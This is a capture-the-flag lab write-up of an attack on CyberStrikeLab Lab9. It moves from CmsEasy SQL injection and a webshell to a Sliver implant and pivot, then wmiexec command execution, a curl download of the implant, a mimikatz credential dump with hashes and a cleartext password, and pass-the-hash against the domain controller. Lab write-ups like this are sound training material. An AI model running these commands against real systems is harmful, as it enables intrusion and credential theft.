
CyberStrikeLab-Lab9-WriteUp

Lab9

Entry point - 172.5.33.6

172.5.33.6

❯ gogo -i 172.5.33.6 -p all -ev
[*] gogo: , 2025-05-22 14:10.48
[*] Current goroutines: 1000, Version Level: 1,Exploit: auto, PortSpray: false , 2025-05-22 14:10.48
[*] Start task 172.5.33.6 ,total ports: 368 , mod: default , 2025-05-22 14:10.48
[*] too much ports , only show top 100 ports: 8017,9095,8099,7010,11210,442,6001,8004,4848,8014,8763,10001,7005,8092,7000,8002,8007,3873,20882,7007,2379,9300,81,444,8000,7001,icmp,16201,22,84,8070,8880,8873,9990,8870,9097,8024,6984,33066,7890,9092,8222,23,50020,4430,8003,9443,15011,8300,9000,8015,9081,8878,9096,8899,10022,18090,11211,1001,7443,8765,8093,16000,winrm,901,70,3001,8012,5005,10250,13389,83,8091,27019,8085,8881,18088,8887,4443,8848,10002,143,8096,5672,10255,1099,21,2100,80,9004,1435,8087,7080,9094,9070,8882,443,1080,5601,1311...... , 2025-05-22 14:10.48
[*] Default Scan is expected to take 4 seconds , 2025-05-22 14:10.48
[+] winrm://172.5.33.6:5985		winrm:Windows 10 1607/Server2016(10.0.14393):default	WIN-784BAKDI0AC/WIN-784BAKDI0AC [winrm] WIN-784BAKDI0AC/WIN-784BAKDI0AC
[+] wmi://172.5.33.6:135		wmi:default	/ [wmi] /
[+] http://172.5.33.6:80	Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02	poweredby:php/5.6.9||php||mod_fcgid	 [200] HTTP/1.1 200
[+] tcp://172.5.33.6:3306		mysql:guess	 [open]
[*] Alived: 4, Total: 368 , 2025-05-22 14:11.00
[*] Time consuming: 12.361886167s , 2025-05-22 14:11.00

80-CmsEasy


CmsEasy

v.7753

The matching version file on the official site:

https://www.cmseasy.cn/published/show-1596.html

<?php
# CmsEasy Enterprise Content Management System
# Copyright (C) CmsEasy Co.,Ltd (https://www.CmsEasy.cn). All rights reserved.
define('_VERSION','7_7_5_20211012_UTF8');
define('_VERNUM','7.7.5.20211012');
define('_VERCODE','7753');# This program is an open source system, commercial use, please consciously to purchase commercial license.
# Copyright (C) CmsEasy Co., Ltd. (https://www.CmsEasy.cn). All rights reserved.

Arbitrary file write

https://jdr2021.github.io/2021/10/14/CmsEasy_7.7.5_20211012存在任意文件写入和任意文件读取漏洞/#安装包下载

But this is an authenticated (admin backend) vulnerability, so a login is needed first.

SQL injection

https://github.com/MzzdToT/CmsEasy_sql/blob/main/cmseasy_sql_scan.py

http://172.5.33.6/?case=crossall&act=execsql&sql=Ud-ZGLMFKBOhqavNJNK5WRCu9igJtYN1rVCO8hMFRM8NIKe6qmhRfWexXUiOqRN4aCe9aUie4Rtw5

The `sql` value is the encoded query that the linked script generates. Visiting this path returns the admin row:

{"userid":"1","username":"admin","password":"a66abb5684c45962d887564f08346e8d","nickname":"\u7ba1\u7406\u5458","groupid":"2","checked":"1","qqlogin":"","alipaylogin":"","wechatlogin":"","avatar":"","userip":"","state":"0","qq":"1111","e_mail":"admin@qq.com","address":"admin","tel":"admin","question":"","answer":"","intro":"","point":"0","introducer":"0","regtime":"0","sex":"","isblock":"0","isdelete":"0","headimage":"\/html\/upload\/images\/201907\/15625455867367.png","integration":"0","couponidnum":"17:0:1","collect":"2,4,3,46,14,73","menoy":"100.07","adddatetime":"2021-09-01 00:00:00","notifiid":"","templatelang":"cn","adminlang":"cn","buyarchive":"","adminlangdomain":"","templatelangdomain":"","expired_time":"0"}

That gives the admin password MD5, which cracks to:

a66abb5684c45962d887564f08346e8d:admin123456

admin123456, so a weak password after all.

File written successfully through the backend arbitrary-file-write.

webshell


Checked with tasklist /svc: no AV running.

config

sliver (lab9) > cat config_database.php
<?php if (!defined('ROOT')) exit('Can\'t Access !'); return array ('database'=>array(
'hostname'=>'localhost',//MySQL server
'database'=>'eyou',//database name
'user'=>'eyou',//database user
'password'=>'cyberstrike@2024',//database password
'prefix'=>'cmseasy_',//table prefix
'encoding'=>'utf8',//encoding
'type' => 'mysqli',//database type
),);
sliver (lab9) > pwd
[*] C:\phpstudy_pro\WWW\config

flag1

sliver (lab9) > cat c:/flag.txt
[*] Supplied pattern c:/flag.txt matched file c:\flag.txt
go-flag{8ECCA5CC1}

Second subnet - 10.6.6.10

sliver (lab9) > ifconfig

+--------------------------------------+
| Ethernet instance 2                  |
+--------------------------------------+
| # | IP Addresses | MAC Address       |
+---+--------------+-------------------+
| 2 | 10.6.6.10/24 | a0:0c:91:78:30:0d |
+---+--------------+-------------------+

+----------------------------------------+
| Ethernet instance 1                    |
+----------------------------------------+
|  # | IP Addresses  | MAC Address       |
+----+---------------+-------------------+
| 11 | 172.5.33.6/24 | 80:98:cb:ad:6d:db |
+----+---------------+-------------------+
3 adapters not shown.

fscan - port scan

PS C:\phpstudy_pro\WWW\config> .\fscan2.exe -h 10.6.6.10/24 -p 1-65535
fscan version: 2.0.0
[*] Scan type: all, target ports: 1-65535
[*] Starting information scan...
[*] CIDR range: 10.6.6.0-10.6.6.255
[*] Generated IP range: 10.6.6.0 - 10.6.6.255
[*] Parsed CIDR 10.6.6.10/24 -> IP range 10.6.6.0-10.6.6.255
[*] Final valid host count: 256
[+] Target 10.6.6.10       alive (ICMP)
[+] Target 10.6.6.55       alive (ICMP)
[+] Target 10.6.6.88       alive (ICMP)
[+] ICMP alive host count: 3
[*] Parsed 65535 valid ports
[+] Port open 10.6.6.88:139
[+] Port open 10.6.6.55:139
[+] Port open 10.6.6.10:139
[+] Port open 10.6.6.88:135
[+] Port open 10.6.6.55:135
[+] Port open 10.6.6.10:135
[+] Port open 10.6.6.55:88
[+] Port open 10.6.6.55:80
[+] Port open 10.6.6.10:80
[+] Port open 10.6.6.55:53
[+] Port open 10.6.6.55:389
[+] Port open 10.6.6.10:445
[+] Port open 10.6.6.55:445
[+] Port open 10.6.6.88:445
[+] Port open 10.6.6.55:464
[+] Port open 10.6.6.55:593
[+] Port open 10.6.6.55:636
[+] Port open 10.6.6.55:3268
[+] Port open 10.6.6.55:3269
[+] Port open 10.6.6.10:3306
[+] Port open 10.6.6.88:3389
[+] Port open 10.6.6.10:5985
[+] Port open 10.6.6.88:5985
[+] Port open 10.6.6.55:5985
[+] Port open 10.6.6.55:9389
PS C:\phpstudy_pro\WWW\config> .\fscan2.exe -h 10.6.6.10/24 -o 10.txt
fscan version: 2.0.0
[*] Scan type: all, target ports: 21,22,80,81,135,139,443,445,1433,1521,3306,5432,6379,7001,8000,8080,8089,9000,9200,11211,27017,80,81,82,83,84,85,86,87,88,89,90,91,92,98,99,443,800,801,808,880,888,889,1000,1010,1080,1081,1082,1099,1118,1888,2008,2020,2100,2375,2379,3000,3008,3128,3505,5555,6080,6648,6868,7000,7001,7002,7003,7004,7005,7007,7008,7070,7071,7074,7078,7080,7088,7200,7680,7687,7688,7777,7890,8000,8001,8002,8003,8004,8006,8008,8009,8010,8011,8012,8016,8018,8020,8028,8030,8038,8042,8044,8046,8048,8053,8060,8069,8070,8080,8081,8082,8083,8084,8085,8086,8087,8088,8089,8090,8091,8092,8093,8094,8095,8096,8097,8098,8099,8100,8101,8108,8118,8161,8172,8180,8181,8200,8222,8244,8258,8280,8288,8300,8360,8443,8448,8484,8800,8834,8838,8848,8858,8868,8879,8880,8881,8888,8899,8983,8989,9000,9001,9002,9008,9010,9043,9060,9080,9081,9082,9083,9084,9085,9086,9087,9088,9089,9090,9091,9092,9093,9094,9095,9096,9097,9098,9099,9100,9200,9443,9448,9800,9981,9986,9988,9998,9999,10000,10001,10002,10004,10008,10010,10250,12018,12443,14000,16080,18000,18001,18002,18004,18008,18080,18082,18088,18090,18098,19001,20000,20720,21000,21501,21502,28018,20880
[*] Starting information scan...
[*] CIDR range: 10.6.6.0-10.6.6.255
[*] Generated IP range: 10.6.6.0 - 10.6.6.255
[*] Parsed CIDR 10.6.6.10/24 -> IP range 10.6.6.0-10.6.6.255
[*] Final valid host count: 256
[+] Target 10.6.6.10       alive (ICMP)
[+] Target 10.6.6.55       alive (ICMP)
[+] Target 10.6.6.88       alive (ICMP)
[+] ICMP alive host count: 3
[*] Parsed 218 valid ports
[+] Port open 10.6.6.10:3306
[+] Port open 10.6.6.88:445
[+] Port open 10.6.6.55:445
[+] Port open 10.6.6.10:445
[+] Port open 10.6.6.88:139
[+] Port open 10.6.6.55:139
[+] Port open 10.6.6.10:139
[+] Port open 10.6.6.88:135
[+] Port open 10.6.6.55:135
[+] Port open 10.6.6.10:135
[+] Port open 10.6.6.55:88
[+] Port open 10.6.6.55:80
[+] Port open 10.6.6.10:80
[+] Open port count: 13
[*] Starting vulnerability scan...
[!] Scan error 10.6.6.10:3306 - Error 1130: Host 'WIN-784BAKDI0AC' is not allowed to connect to this MySQL server
[*] NetInfo
[*] 10.6.6.55[->] DC[->] 10.6.6.55
[*] NetInfo
[*] 10.6.6.10[->] WIN-784BAKDI0AC[->] 172.5.33.6[->] 10.6.6.10
[*] Website title http://10.6.6.10          status:200 length:77272  title:中文网页标题
[!] Scan error 10.6.6.10:445 - could not determine whether the target is vulnerable
[*] NetInfo
[*] 10.6.6.88[->] cyberweb[->] 10.6.6.88
[!] Scan error 10.6.6.55:139 - netbios error
[!] Scan error 10.6.6.55:88 - Get "http://10.6.6.55:88": read tcp 10.6.6.10:49285->10.6.6.55:88: wsarecv: An existing connection was forcibly closed by the remote host.
[*] OsInfo 10.6.6.55	(Windows Server 2016 Standard 14393)
[!] Scan error 10.6.6.10:139 - netbios error
[!] Scan error 10.6.6.55:80 - Get "http://10.6.6.55": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[*] OsInfo 10.6.6.88	(Windows Server 2016 Standard 14393)
[*] NetBios 10.6.6.88       cyberweb.cyberstrikelab.com         Windows Server 2016 Standard 14393
[+] Scan complete: 13/13
[*] Scan finished, elapsed: 1m20.5048977s
PS C:\phpstudy_pro\WWW\config> cat result.txt
[+] Port open 10.6.6.88:139
[+] Port open 10.6.6.55:139
[+] Port open 10.6.6.10:139
[+] Port open 10.6.6.88:135
[+] Port open 10.6.6.55:135
[+] Port open 10.6.6.10:135
[+] Port open 10.6.6.55:88
[+] Port open 10.6.6.55:80
[+] Port open 10.6.6.10:80
[+] Port open 10.6.6.55:53
[+] Port open 10.6.6.55:389
[+] Port open 10.6.6.10:445
[+] Port open 10.6.6.55:445
[+] Port open 10.6.6.88:445
[+] Port open 10.6.6.55:464
[+] Port open 10.6.6.55:593
[+] Port open 10.6.6.55:636
[+] Port open 10.6.6.55:3268
[+] Port open 10.6.6.55:3269
[+] Port open 10.6.6.10:3306
[+] Port open 10.6.6.88:3389
[+] Port open 10.6.6.10:5985
[+] Port open 10.6.6.88:5985
[+] Port open 10.6.6.55:5985
[+] Port open 10.6.6.55:9389
[+] Port open 10.6.6.10:47001
[+] Port open 10.6.6.88:47001
[+] Port open 10.6.6.88:49664
[+] Port open 10.6.6.10:49665
[+] Port open 10.6.6.10:49664
[+] Port open 10.6.6.55:49670
[+] Port open 10.6.6.10:49670
[+] Port open 10.6.6.88:49669
[+] Port open 10.6.6.55:49669
[+] Port open 10.6.6.10:49669
[+] Port open 10.6.6.88:49668
[+] Port open 10.6.6.55:49668
[+] Port open 10.6.6.55:49667
[+] Port open 10.6.6.10:49668
[+] Port open 10.6.6.88:49667
[+] Port open 10.6.6.10:49667
[+] Port open 10.6.6.88:49666
[+] Port open 10.6.6.10:49666
[+] Port open 10.6.6.88:49665
[+] Port open 10.6.6.55:49680
[+] Port open 10.6.6.88:49671
[+] Port open 10.6.6.55:49671
[+] Port open 10.6.6.88:49670
[+] Port open 10.6.6.55:49708
[+] Port open 10.6.6.55:49725
[*] NetInfo
[*] 10.6.6.10[->] WIN-784BAKDI0AC[->] 172.5.33.6[->] 10.6.6.10
[*] Website title http://10.6.6.10          status:200 length:77272  title:中文网页标题
[*] NetInfo
[*] 10.6.6.55[->] DC[->] 10.6.6.55
[*] NetInfo
[*] 10.6.6.88[->] cyberweb[->] 10.6.6.88
[*] Website title http://10.6.6.55          status:200 length:703    title:IIS Windows Server
[*] Website title http://10.6.6.88:5985     status:404 length:315    title:Not Found
[*] Website title http://10.6.6.88:47001    status:404 length:315    title:Not Found
[*] Website title http://10.6.6.55:5985     status:404 length:315    title:Not Found
[*] NetBios 10.6.6.88       cyberweb.cyberstrikelab.com         Windows Server 2016 Standard 14393
[*] OsInfo 10.6.6.55	(Windows Server 2016 Standard 14393)
[*] OsInfo 10.6.6.88	(Windows Server 2016 Standard 14393)
[+] [Vulnerability found] target: http://10.6.6.55 type: poc-yaml-active-directory-certsrv-detect name:  details: %!s(<nil>)
[*] Website title http://10.6.6.10:5985     status:404 length:315    title:Not Found
[*] Website title http://10.6.6.10:47001    status:404 length:315    title:Not Found
[+] RDP 10.6.6.88:3389:administrator qwe123!@#
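The scan above is read by eye: 10.6.6.55 is the DC because it exposes Kerberos, LDAP, LDAPS, DNS and the global catalog, 10.6.6.55 also serves IIS where fscan's certsrv probe fired, and 10.6.6.88 only offers RDP/WinRM/SMB. The following script is an added example, not part of the original write-up and not fscan's own code: it parses fscan-style "port open" lines into a per-host port list and applies a simple port-based role heuristic. The sample lines are constructed from the results shown on this page (with the output labels translated); the role table is this example's assumption.

```python
"""Parse fscan "port open host:port" lines and infer host roles from well-known
AD service ports. Added example; the heuristics are assumptions, not fscan logic."""
import re
from collections import defaultdict

# Constructed sample in fscan 2.x's (translated) output format.
SAMPLE_SCAN = """\
[+] port open 10.6.6.55:88
[+] port open 10.6.6.55:53
[+] port open 10.6.6.55:389
[+] port open 10.6.6.55:636
[+] port open 10.6.6.55:3268
[+] port open 10.6.6.55:80
[+] port open 10.6.6.55:445
[+] port open 10.6.6.10:80
[+] port open 10.6.6.10:3306
[+] port open 10.6.6.10:445
[+] port open 10.6.6.88:3389
[+] port open 10.6.6.88:445
[+] port open 10.6.6.88:5985
[!] scan error 10.6.6.10:3306 - Error 1130
"""

PORT_RE = re.compile(r"^\[\+\] port open (\d{1,3}(?:\.\d{1,3}){3}):(\d+)\s*$")

# Assumed heuristics: Kerberos + LDAP + LDAPS together almost always mean a DC.
DC_CORE = {88, 389, 636}
# Remote-admin services worth noting per host, in the order they are reported.
REMOTE_ADMIN = {3389: "rdp", 5985: "winrm", 445: "smb"}


def parse_open_ports(text):
    """Return {host: sorted list of open ports}; error and info lines are ignored."""
    hosts = defaultdict(set)
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            hosts[m.group(1)].add(int(m.group(2)))
    return {h: sorted(p) for h, p in hosts.items()}


def infer_roles(ports):
    """Label one host from its open ports (see DC_CORE / REMOTE_ADMIN above)."""
    s = set(ports)
    roles = []
    if DC_CORE <= s:
        roles.append("dc")
        if 80 in s:
            # IIS on a DC is where AD CS web enrollment (/certsrv) usually lives; verify it.
            roles.append("adcs-web-enrollment?")
    roles += [name for port, name in REMOTE_ADMIN.items() if port in s]
    if 3306 in s:
        roles.append("mysql")
    return roles


def summarize(text):
    """{host: [roles]} for every host that has at least one open port."""
    return {host: infer_roles(ports) for host, ports in parse_open_ports(text).items()}


if __name__ == "__main__":
    for host, roles in sorted(summarize(SAMPLE_SCAN).items()):
        print(host, ",".join(roles))
```

Feed it the real `result.txt` (after translating the labels, or by adjusting `PORT_RE` to the untranslated prefix) and the DC and the certsrv candidate fall out without reading seventy lines by hand.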

Note that AD CS is present: fscan's poc-yaml-active-directory-certsrv-detect fired on http://10.6.6.55, i.e. the certificate web enrollment endpoint is exposed on the DC.

cyberstrikelab.com

cyberweb - 10.6.6.88

RDP - weak password

Local account password (reported by fscan's RDP brute force):

10.6.6.88:3389:administrator qwe123!@#

Start a SOCKS proxy straight from the Sliver session; the netexec commands below go through it.

sliver (lab9) > socks5 start
[*] Started SOCKS5 127.0.0.1 1081
⚠️  In-band SOCKS proxies can be a little unstable depending on protocol
❯ netexec smb 10.6.6.88 -u administrator -p 'qwe123!@#'   --local-auth  -x 'whoami'
SMB         10.6.6.88       445    CYBERWEB         [*] Windows Server 2016 Standard 14393 x64 (name:CYBERWEB) (domain:CYBERWEB) (signing:False) (SMBv1:True)
SMB         10.6.6.88       445    CYBERWEB         [+] CYBERWEB\administrator:qwe123!@# (Pwn3d!)
SMB         10.6.6.88       445    CYBERWEB         [+] Executed command via wmiexec
SMB         10.6.6.88       445    CYBERWEB         cyberweb\administrator

Microsoft Remote Desktop would not connect, so I had to work from the command line.

flag2

❯ netexec smb 10.6.6.88 -u administrator -p 'qwe123!@#'   --local-auth  -x 'dir c:\'
SMB         10.6.6.88       445    CYBERWEB         [*] Windows Server 2016 Standard 14393 x64 (name:CYBERWEB) (domain:CYBERWEB) (signing:False) (SMBv1:True)
SMB         10.6.6.88       445    CYBERWEB         [+] CYBERWEB\administrator:qwe123!@# (Pwn3d!)
SMB         10.6.6.88       445    CYBERWEB         [+] Executed command via wmiexec
SMB         10.6.6.88       445    CYBERWEB          Volume in drive C has no label.
SMB         10.6.6.88       445    CYBERWEB          Volume Serial Number is F667-4B31
SMB         10.6.6.88       445    CYBERWEB          Directory of c:\
SMB         10.6.6.88       445    CYBERWEB         2025/04/22  16:36                45 flag.txt
SMB         10.6.6.88       445    CYBERWEB         2025/04/22  16:55    <DIR>          PerfLogs
SMB         10.6.6.88       445    CYBERWEB         2018/02/03  03:38    <DIR>          Program Files
SMB         10.6.6.88       445    CYBERWEB         2016/07/16  21:23    <DIR>          Program Files (x86)
SMB         10.6.6.88       445    CYBERWEB         2025/04/22  16:58    <DIR>          smb
SMB         10.6.6.88       445    CYBERWEB         2025/04/22  16:07    <DIR>          Users
SMB         10.6.6.88       445    CYBERWEB         2025/02/19  18:11    <DIR>          Windows
SMB         10.6.6.88       445    CYBERWEB                        1 File(s)             45 bytes
SMB         10.6.6.88       445    CYBERWEB                        6 Dir(s)  31,290,617,856 bytes free
❯ netexec smb 10.6.6.88 -u administrator -p 'qwe123!@#'   --local-auth  -x 'type c:\flag.txt'
SMB         10.6.6.88       445    CYBERWEB         [*] Windows Server 2016 Standard 14393 x64 (name:CYBERWEB) (domain:CYBERWEB) (signing:False) (SMBv1:True)
SMB         10.6.6.88       445    CYBERWEB         [+] CYBERWEB\administrator:qwe123!@# (Pwn3d!)
SMB         10.6.6.88       445    CYBERWEB         [+] Executed command via wmiexec
SMB         10.6.6.88       445    CYBERWEB         go-flag{0A43311646}

pivots

sliver (lab9) > pivots

 ID   Protocol   Bind Address   Number Of Pivots
==== ========== ============== ==================
 1    TCP        0.0.0.0:9898                  0

sliver (lab9) > background
[*] Background ...
sliver > generate --tcp-pivot 10.6.6.10:9898 --os windows
[*] Generating new windows/amd64 implant binary
[*] Symbol obfuscation is enabled
[*] Build completed in 16s
[*] Implant saved to /Users/a/Desktop/tool/sliver/LARGE_POWER.exe

Set up a pivot: a TCP pivot listener on the 10.6.6.10 session (bound on 0.0.0.0:9898) and an implant that calls back to 10.6.6.10:9898, to bring cyberweb online.

I originally wanted to upload the implant over SMB, but through the proxy it was unstable and the upload kept failing.

So I served it from the web root on 10.6.6.10 instead.

❯ netexec smb 10.6.6.88 -u administrator -p 'qwe123!@#'   --local-auth  -x 'curl 10.6.6.10/LARGE_POWER.exe -o  c:\smb\LARGE_POWER.exe'
SMB         10.6.6.88       445    CYBERWEB         [*] Windows Server 2016 Standard 14393 x64 (name:CYBERWEB) (domain:CYBERWEB) (signing:False) (SMBv1:True)
SMB         10.6.6.88       445    CYBERWEB         [+] CYBERWEB\administrator:qwe123!@# (Pwn3d!)
SMB         10.6.6.88       445    CYBERWEB         [+] Executed command via wmiexec
SMB         10.6.6.88       445    CYBERWEB         'curl' is not recognized as an internal or external command,
SMB         10.6.6.88       445    CYBERWEB         operable program or batch file.

curl.exe only ships with Windows from 10 1803 / Server 2019 onward, so on this Server 2016 box the download has to go through certutil -urlcache -f or PowerShell's Invoke-WebRequest instead.

Even after getting it uploaded, the implant still would not call back.

mimikatz

Ran mimikatz via wmiexec. (The first argument `sekurlsa::debug` is a typo for `privilege::debug`, which is why the output opens with a "command not found" error and the sekurlsa module help; the logonpasswords dump still went through.)

c:\smb>mimikatz.exe "sekurlsa::debug " "sekurlsa::logonpasswords" "exit"> pssword.txt

  .#####.   mimikatz 2.1.1 (x64) #17763 Dec  9 2018 23:56:50
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo) ** Kitten Edition **
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

mimikatz(commandline) # sekurlsa::debug
ERROR mimikatz_doLocal ; "debug" command of "sekurlsa" module not found !

Module :	sekurlsa
Full name :	SekurLSA module
Description :	Some commands to enumerate credentials...

             msv  -  Lists LM & NTLM credentials
         wdigest  -  Lists WDigest credentials
        kerberos  -  Lists Kerberos credentials
           tspkg  -  Lists TsPkg credentials
         livessp  -  Lists LiveSSP credentials
             ssp  -  Lists SSP credentials
  logonPasswords  -  Lists all available providers credentials
         process  -  Switch (or reinit) to LSASS process  context
        minidump  -  Switch (or reinit) to LSASS minidump context
             pth  -  Pass-the-hash
          krbtgt  -  krbtgt!
     dpapisystem  -  DPAPI_SYSTEM secret
           trust  -  Antisocial
      backupkeys  -  Preferred Backup Master keys
         tickets  -  List Kerberos tickets
           ekeys  -  List Kerberos Encryption Keys
           dpapi  -  List Cached MasterKeys
         credman  -  List Credentials Manager

mimikatz(commandline) # sekurlsa::logonpasswords

Authentication Id : 0 ; 1780709 (00000000:001b2be5)
Session           : Interactive from 3
User Name         : DWM-3
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2025/5/22 16:58:36
SID               : S-1-5-90-0-3
	msv :
	 [00000003] Primary
	 * Username : CYBERWEB$
	 * Domain   : CYBERSTRIKELAB
	 * NTLM     : 331dcbb88d1a4847c97eab7c1c168ac8
	 * SHA1     : 0a4c17b8f051223716e86c36f1dec902e266c773
	tspkg :
	wdigest :
	 * Username : CYBERWEB$
	 * Domain   : CYBERSTRIKELAB
	 * Password : (null)
	kerberos :
	 * Username : CYBERWEB$
	 * Domain   : cyberstrikelab.com
	 * Password : I@w2(l8:$e9`bRA7&$Rxd^f@6+_,hg\L)&Ck6he8vlsS7*=[e*%bh-wZ.,$HV(0^!/q0eY=sDH_1)6jK3v;#%kt[5YSXt3$y/;R(wAqp1p_`""m=o:Q;HtsY
	ssp :
	credman :

Authentication Id : 0 ; 1780585 (00000000:001b2b69)
Session           : Interactive from 3
User Name         : DWM-3
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2025/5/22 16:58:36
SID               : S-1-5-90-0-3
	msv :
	 [00000003] Primary
	 * Username : CYBERWEB$
	 * Domain   : CYBERSTRIKELAB
	 * NTLM     : 331dcbb88d1a4847c97eab7c1c168ac8
	 * SHA1     : 0a4c17b8f051223716e86c36f1dec902e266c773
	tspkg :
	wdigest :
	 * Username : CYBERWEB$
	 * Domain   : CYBERSTRIKELAB
	 * Password : (null)
	kerberos :
	 * Username : CYBERWEB$
	 * Domain   : cyberstrikelab.com
	 * Password : I@w2(l8:$e9`bRA7&$Rxd^f@6+_,hg\L)&Ck6he8vlsS7*=[e*%bh-wZ.,$HV(0^!/q0eY=sDH_1)6jK3v;#%kt[5YSXt3$y/;R(wAqp1p_`""m=o:Q;HtsY
	ssp :
	credman :

Authentication Id : 0 ; 51034 (00000000:0000c75a)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2025/5/22 7:28:15
SID               : S-1-5-90-0-1
	msv :
	 [00000003] Primary
	 * Username : CYBERWEB$
	 * Domain   : CYBERSTRIKELAB
	 * NTLM     : 331dcbb88d1a4847c97eab7c1c168ac8
	 * SHA1     : 0a4c17b8f051223716e86c36f1dec902e266c773
	tspkg :
	wdigest :
	 * Username : CYBERWEB$
	 * Domain   : CYBERSTRIKELAB
	 * Password : (null)
	kerberos :
	 * Username : CYBERWEB$
	 * Domain   : cyberstrikelab.com
	 * Password : I@w2(l8:$e9`bRA7&$Rxd^f@6+_,hg\L)&Ck6he8vlsS7*=[e*%bh-wZ.,$HV(0^!/q0eY=sDH_1)6jK3v;#%kt[5YSXt3$y/;R(wAqp1p_`""m=o:Q;HtsY
	ssp :
	credman :

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : CYBERWEB$
Domain            : CYBERSTRIKELAB
Logon Server      : (null)
Logon Time        : 2025/5/22 7:28:09
SID               : S-1-5-20
	msv :
	 [00000003] Primary
	 * Username : CYBERWEB$
	 * Domain   : CYBERSTRIKELAB
	 * NTLM     : 331dcbb88d1a4847c97eab7c1c168ac8
	 * SHA1     : 0a4c17b8f051223716e86c36f1dec902e266c773
	tspkg :
	wdigest :
	 * Username : CYBERWEB$
	 * Domain   : CYBERSTRIKELAB
	 * Password : (null)
	kerberos :
	 * Username : cyberweb$
	 * Domain   : CYBERSTRIKELAB.COM
	 * Password : (null)
	ssp :
	credman :

Authentication Id : 0 ; 306483 (00000000:0004ad33)
Session           : Interactive from 0
User Name         : cslab
Domain            : CYBERSTRIKELAB
Logon Server      : DC
Logon Time        : 2025/5/22 15:31:45
SID               : S-1-5-21-4286488488-1212600890-1604239976-1104
	msv :
	 [00000003] Primary
	 * Username : cslab
	 * Domain   : CYBERSTRIKELAB
	 * NTLM     : 39b0e84f13872f51efb3b8ba5018c517
	 * SHA1     : fa6a465532224cc4f1fa5094424bf219d25b7463
	 * DPAPI    : 432dfb0f990f2cc292b2fd09468aab5e
	tspkg :
	wdigest :
	 * Username : cslab
	 * Domain   : CYBERSTRIKELAB
	 * Password : (null)
	kerberos :
	 * Username : cslab
	 * Domain   : CYBERSTRIKELAB.COM
	 * Password : (null)
	ssp :
	credman :

Authentication Id : 0 ; 131588 (00000000:00020204)
Session           : Interactive from 1
User Name         : Administrator
Domain            : CYBERWEB
Logon Server      : CYBERWEB
Logon Time        : 2025/5/22 7:29:19
SID               : S-1-5-21-332097019-2215467117-1557799732-500
	msv :
	 [00000003] Primary
	 * Username : Administrator
	 * Domain   : CYBERWEB
	 * NTLM     : c377ba8a4dd52401bc404dbe49771bbc
	 * SHA1     : d9ac14100bf4e36f6807dd3c29051983b2d58d3d
	tspkg :
	wdigest :
	 * Username : Administrator
	 * Domain   : CYBERWEB
	 * Password : (null)
	kerberos :
	 * Username : Administrator
	 * Domain   : CYBERWEB
	 * Password : (null)
	ssp :
	credman :

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2025/5/22 7:28:16
SID               : S-1-5-19
	msv :
	tspkg :
	wdigest :
	 * Username : (null)
	 * Domain   : (null)
	 * Password : (null)
	kerberos :
	 * Username : (null)
	 * Domain   : (null)
	 * Password : (null)
	ssp :
	credman :

Authentication Id : 0 ; 51057 (00000000:0000c771)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2025/5/22 7:28:15
SID               : S-1-5-90-0-1
	msv :
	 [00000003] Primary
	 * Username : CYBERWEB$
	 * Domain   : CYBERSTRIKELAB
	 * NTLM     : 331dcbb88d1a4847c97eab7c1c168ac8
	 * SHA1     : 0a4c17b8f051223716e86c36f1dec902e266c773
	tspkg :
	wdigest :
	 * Username : CYBERWEB$
	 * Domain   : CYBERSTRIKELAB
	 * Password : (null)
	kerberos :
	 * Username : CYBERWEB$
	 * Domain   : cyberstrikelab.com
	 * Password : I@w2(l8:$e9`bRA7&$Rxd^f@6+_,hg\L)&Ck6he8vlsS7*=[e*%bh-wZ.,$HV(0^!/q0eY=sDH_1)6jK3v;#%kt[5YSXt3$y/;R(wAqp1p_`""m=o:Q;HtsY
	ssp :
	credman :

Authentication Id : 0 ; 23220 (00000000:00005ab4)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 2025/5/22 7:28:06
SID               :
	msv :
	 [00000003] Primary
	 * Username : CYBERWEB$
	 * Domain   : CYBERSTRIKELAB
	 * NTLM     : 331dcbb88d1a4847c97eab7c1c168ac8
	 * SHA1     : 0a4c17b8f051223716e86c36f1dec902e266c773
	tspkg :
	wdigest :
	kerberos :
	ssp :
	credman :

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : CYBERWEB$
Domain            : CYBERSTRIKELAB
Logon Server      : (null)
Logon Time        : 2025/5/22 7:28:05
SID               : S-1-5-18
	msv :
	tspkg :
	wdigest :
	 * Username : CYBERWEB$
	 * Domain   : CYBERSTRIKELAB
	 * Password : (null)
	kerberos :
	 * Username : cyberweb$
	 * Domain   : CYBERSTRIKELAB.COM
	 * Password : (null)
	ssp :
	credman :

mimikatz(commandline) # exit
Bye!

That yields the NTLM hash of the domain user cslab (the dump also contains the CYBERWEB$ machine-account hash and, under the kerberos provider, its cleartext password, but the user hash is what is needed next):

cslab : 39b0e84f13872f51efb3b8ba5018c517

dc - 10.6.6.55

bloodhound

❯ netexec ldap 10.6.6.55 -u cslab -H 39b0e84f13872f51efb3b8ba5018c517   --bloodhound -c All  --dns-server 10.6.6.55  --dns-tcp
SMB         10.6.6.55       445    DC               [*] Windows Server 2016 Standard 14393 x64 (name:DC) (domain:cyberstrikelab.com) (signing:True) (SMBv1:True)
LDAP        10.6.6.55       389    DC               [+] cyberstrikelab.com\cslab:39b0e84f13872f51efb3b8ba5018c517
